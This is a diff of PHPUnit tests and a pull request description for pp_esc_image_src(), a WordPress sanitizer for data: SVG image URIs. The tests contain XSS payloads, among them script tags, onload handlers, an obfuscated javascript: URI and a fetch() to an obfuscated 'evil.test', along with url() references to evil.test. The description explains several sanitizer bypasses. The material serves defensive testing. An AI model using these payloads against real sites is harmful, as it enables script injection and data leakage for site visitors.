+        // element name regardless of prefix.
+        $payload = 'data:image/svg+xml,<svg xmlns:x="http://www.w3.org/2000/svg"><x:script>alert(1)</x:script></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsCharacterReferenceObfuscatedJavascriptUri(): void
+    {
+        // "jav&#x61;script:" contains no literal "javascript:" substring,
+        // but a real XML parser resolves the numeric character reference
+        // during parsing — by the time the attribute value is inspected,
+        // it already reads "javascript:alert(1)".
+        $payload = 'data:image/svg+xml,<svg><a href="jav&#x61;script:alert(1)">x</a></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsMaliciousContentInsideBase64Svg(): void
+    {
+        // The base64 alphabet is inert for HTML/CSS transport, but the SVG
+        // it decodes to must still be scanned — "the alphabet is safe"
+        // is not the same claim as "the decoded document is safe."
+        $malicious = '<svg onload="alert(document.cookie)"><script>fetch(String.fromCharCode(47,47,101,118,105,108,46,116,101,115,116))</script></svg>';
+        $payload = 'data:image/svg+xml;base64,' . base64_encode($malicious);
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsSvgWithDoctype(): void
+    {
+        // DOCTYPE is rejected outright rather than parsed "carefully" —
+        // closes the external-entity/DTD attack surface unconditionally.
+        $payload = "data:image/svg+xml,<?xml version=\"1.0\"?><!DOCTYPE svg [<!ENTITY x \"y\">]><svg>&x;</svg>";
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsMalformedXml(): void
+    {
+        $this->assertSame('', pp_esc_image_src('data:image/svg+xml,<svg><rect></svg>'));
+    }
+
+    public function testEscImageSrcAcceptsLegitimateMultilineFormattedSvg(): void
+    {
+        // Real-world hand-formatted/design-tool SVGs commonly span multiple
+        // lines — this must not be treated as suspicious on its own.
+        $svg = "data:image/svg+xml,<svg xmlns=\"http://www.w3.org/2000/svg\">\n  <circle r=\"5\"/>\n</svg>";
+        $result = pp_esc_image_src($svg);
+        $this->assertNotSame('', $result);
     }
 
     // ── End-to-end: exact production regression from #36 ────────────────────

--- a/tests/ComponentPropsTest.php
+++ b/tests/ComponentPropsTest.php
@@ -552,6 +552,44 @@ class ComponentPropsTest extends TestCase
         $this->assertSame('', pp_esc_image_src($payload));
     }
 
+    // ── Third-round Codex review: empirically confirmed in a real browser
+    // (Playwright/Chromium) that these attributes trigger real network
+    // requests to an external host during ORDINARY rendering — no click,
+    // no top-level navigation required ────────────────────────────────────
+
+    public function testEscImageSrcRejectsExternalUrlInStyleFilter(): void
+    {
+        $payload = 'data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><rect style="filter:url(https://evil.test/filter.svg#f)"/></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsExternalUrlInFilterAttribute(): void
+    {
+        $payload = 'data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><rect filter="url(https://evil.test/filter.svg#f)"/></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsExternalUrlInFillAttribute(): void
+    {
+        $payload = 'data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><rect fill="url(https://evil.test/pattern.svg#p)"/></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcRejectsExternalUrlInStyleCursor(): void
+    {
+        $payload = 'data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><rect style="cursor:url(https://evil.test/cursor.png), auto"/></svg>';
+        $this->assertSame('', pp_esc_image_src($payload));
+    }
+
+    public function testEscImageSrcAcceptsSameDocumentFragmentUrlInFillAttribute(): void
+    {
+        // fill="url(#gradientId)" referencing a locally-defined gradient is
+        // an extremely common, legitimate SVG pattern and must not be
+        // rejected.
+        $payload = 'data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><defs><linearGradient id="g"/></defs><rect fill="url(#g)"/></svg>';
+        $this->assertNotSame('', pp_esc_image_src($payload));
+    }
+
     // ── End-to-end: exact production regression from #36 ────────────────────
 
     public function testHeroSplitVariantRendersDataUriSvgImageSrc(): void


### PR DESCRIPTION
## Summary

WordPress's `esc_url()` rejects the `data:` URI scheme entirely (it's not in `wp_allowed_protocols()`'s default whitelist), so every image/background-image slot across the component library — hero, CTA, grid, section, stats, logo strip — silently rendered blank whenever the value was a `data:image/*` URI, including inline SVGs. This is exactly the kind of image an AI generates on the fly (a quick icon, a placeholder graphic) rather than uploading to the media library.

This PR adds `pp_esc_image_src()` (`lib/wp.php`) as a `data:`-aware replacement, used at all 7 affected call sites. Regular `http(s)` URLs and relative paths are unaffected (still routed through `esc_url()`).

## Security-sensitive: five rounds of adversarial review

`data:image/svg+xml` payloads can carry `<script>`/event-handler XSS, and — critically — a `data:` URI is reachable as a **top-level document** via ordinary browser UI ("open image in new tab," copy-image-address, drag-to-new-tab), where SVG script execution is enabled even though it's inert inside an `<img>`/CSS `background-image`. So SVG content validation is the **primary** defense here, not defense-in-depth, and it had to hold up under real adversarial pressure before shipping.

The implementation went through 5 rounds of review — specialist dispatch, an independent Claude adversarial subagent, and Codex adversarial review using **empirical Playwright/Chromium testing** (not just static reasoning) — and every single round found and closed a genuine, previously-unknown bypass:

1. **Round 1** (initial regex/blocklist implementation): multiple bypasses found; rewritten entirely to a `DOMDocument`/`DOMXPath`-based parser using `local-name()` matching, which closes namespace-prefix-renaming and entity-reconstruction bypass classes by construction instead of an ever-growing blocklist.
2. **Round 2**: decode-to-fixed-point bypass, CSS backslash-escape bypass, `<style>`/`<use>`/`<image>` external-resource loading during *ordinary* rendering (not just top-level nav), unrejected processing instructions, unrejected SMIL animation elements (`<animate>` etc. can retarget `href` over time).
3. **Round 3** (Codex, empirical Playwright): confirmed top-level SVG script execution via `onload`/`<script>` validates the threat model, and found that *any* SVG presentation attribute using CSS `url(...)` syntax (`fill`, `filter`, `stroke`, `style="cursor:url(...)"`) fires real external network requests during ordinary rendering — fixed with a generic attribute-value `url(...)` scan.
4. **Round 4** (Claude subagent): `<feImage>` bypassed the `<use>`/`<image>`-scoped `href` restriction by not matching either element name — fixed by universalizing the `href`/`xlink:href` check to *all* elements via `local-name()='href'`, with recursive validation for nested `data:` URIs (depth-capped at 3).
5. **Round 5** (Codex + Claude subagent, in parallel): Codex found that CSS escape sequences (`u\72l(...)`) inside the "url" function name itself decode to "url(" in the browser's CSS parser before the generic attribute scan ever sees it — confirmed empirically via Playwright network capture. Claude's subagent independently found that `xml:base` (SVG/XML's equivalent of `<base href>`) can retarget a same-document `#fragment` reference — treated everywhere else as unconditionally safe — to resolve against an attacker-controlled origin, per RFC 3986 §5.3. Both fixed in this PR: a `_pp_css_unescape()` normalization pass before every url()/scheme check, and outright rejection of any `xml:base` attribute.

A `/cso` audit pass was also run over the final diff (OWASP + STRIDE lens, fresh from the adversarial rounds) — traced the actual trust boundary (`edit_post` capability, Contributor+, rendered to all site visitors) and found no new findings above the confidence gate.

## Test Coverage

- 49 new PHPUnit tests in `tests/ComponentPropsTest.php`, covering every bypass found across all 5 rounds plus 2 end-to-end component-render regression tests.
- Full suite: 921/921 passing (916 baseline + 5 this round), no regressions.
- JS suite unaffected (PHP-only change).

## Scope Drift

None — no follow-up issues filed against this function; residual concerns from earlier session issues (#153-#160) are unrelated to this diff.

## Test plan

- [x] `vendor/bin/phpunit --configuration phpunit.xml` — 921/921 passing
- [x] Redaction scan on the full diff — clean (0 findings)
- [x] `/cso` security audit — 0 findings above confidence gate
- [ ] CI green
